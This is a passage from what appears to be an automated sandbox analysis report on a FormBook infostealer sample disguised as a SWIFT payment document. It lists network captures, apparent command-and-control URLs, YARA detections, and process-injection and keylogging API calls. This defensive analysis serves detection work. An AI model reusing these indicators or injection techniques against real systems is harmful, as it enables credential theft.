6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:14 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c31b9a5572ad-EWRContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1873&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=828&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:17 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c32b7e48c337-EWRContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1452&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=852&delivery_rate=0&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:19 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c33b6aa5c439-EWRContent-Encoding: gzipserver-timing: cfL4;desc="?proto=TCP&rtt=1499&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1865&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a Data Ascii: 6f\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.bh
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 20 Nov 2024 07:35:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidateExpires: Wed, 20 Nov 2024 07:35:22 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 8e56c34b793d7291-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1809&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>0
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                Source: rasautou.exe, 00000004.00000002.4614264307.00000000062E2000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004102000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                Source: nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.00000000045B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.madhf.tech/vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7P
                Source: nBMWUKLuWlMJko.exe, 00000006.00000002.4613324935.0000000002DD6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nonpressure.beauty
                Source: nBMWUKLuWlMJko.exe, 00000006.00000002.4613324935.0000000002DD6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nonpressure.beauty/ymqd/
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000006474000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004294000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000006C4E000.00000004.10000000.00040000.00000000.sdmp, rasautou.exe, 00000004.00000002.4616494626.0000000007B20000.00000004.00000800.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000004A6E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rasautou.exe, 00000004.00000003.2510041417.0000000007E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033YEf
                Source: rasautou.exe, 00000004.00000002.4606460151.00000000031B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rasautou.exe, 00000004.00000002.4606460151.0000000003191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005B08000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003928000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                Source: rasautou.exe, 00000004.00000002.4616647777.0000000007E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: rasautou.exe, 00000004.00000002.4614264307.0000000005976000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.0000000003796000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/5rfk/?GR54yHZ8=sD5zUlt3wbrvSr53X/LgfhW
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00976B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00976B0C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00976D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00976D07
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00976B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00976B0C
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_00962B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00962B37
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: 0_2_0098F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0098F7FF

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00923D19
                Source: SWIFT COPY 0028_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000000.2136017307.00000000009CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ca2ffd59-d
                Source: SWIFT COPY 0028_pdf.exe, 00000000.00000000.2136017307.00000000009CE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_47e9354c-b
                Source: SWIFT COPY 0028_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_31e6e413-e
                Source: SWIFT COPY 0028_pdf.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3b925906-f
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: SWIFT COPY 0028_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CDE3 NtClose,2_2_0042CDE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E44650 NtSuspendThread,LdrInitializeThunk,4_2_04E44650
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E44340 NtSetContextThread,LdrInitializeThunk,4_2_04E44340
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04E42CA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42C60 NtCreateKey,LdrInitializeThunk,4_2_04E42C60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04E42C70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04E42DF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42DD0 NtDelayExecution,LdrInitializeThunk,4_2_04E42DD0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04E42D30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04E42D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04E42EE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04E42E80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42FE0 NtCreateFile,LdrInitializeThunk,4_2_04E42FE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42FB0 NtResumeThread,LdrInitializeThunk,4_2_04E42FB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42F30 NtCreateSection,LdrInitializeThunk,4_2_04E42F30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42AF0 NtWriteFile,LdrInitializeThunk,4_2_04E42AF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42AD0 NtReadFile,LdrInitializeThunk,4_2_04E42AD0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04E42BE0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04E42BF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04E42BA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42B60 NtClose,LdrInitializeThunk,4_2_04E42B60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E435C0 NtCreateMutant,LdrInitializeThunk,4_2_04E435C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E439B0 NtGetContextThread,LdrInitializeThunk,4_2_04E439B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42CF0 NtOpenProcess,4_2_04E42CF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42CC0 NtQueryVirtualMemory,4_2_04E42CC0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42C00 NtQueryInformationProcess,4_2_04E42C00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42DB0 NtEnumerateKey,4_2_04E42DB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42D00 NtSetInformationFile,4_2_04E42D00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42EA0 NtAdjustPrivilegesToken,4_2_04E42EA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42E30 NtWriteVirtualMemory,4_2_04E42E30
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42FA0 NtQuerySection,4_2_04E42FA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42F90 NtProtectVirtualMemory,4_2_04E42F90
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42F60 NtCreateProcessEx,4_2_04E42F60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42AB0 NtWaitForSingleObject,4_2_04E42AB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E42B80 NtQueryInformationFile,4_2_04E42B80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E43090 NtSetValueKey,4_2_04E43090
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E43010 NtOpenDirectoryObject,4_2_04E43010
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E43D70 NtOpenThread,4_2_04E43D70
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_04E43D10 NtOpenProcessToken,4_2_04E43D10
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E79A60 NtDeleteFile,4_2_02E79A60
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E79B00 NtClose,4_2_02E79B00
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E79800 NtCreateFile,4_2_02E79800
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 4_2_02E79970 NtReadFile,4_2_02E79970
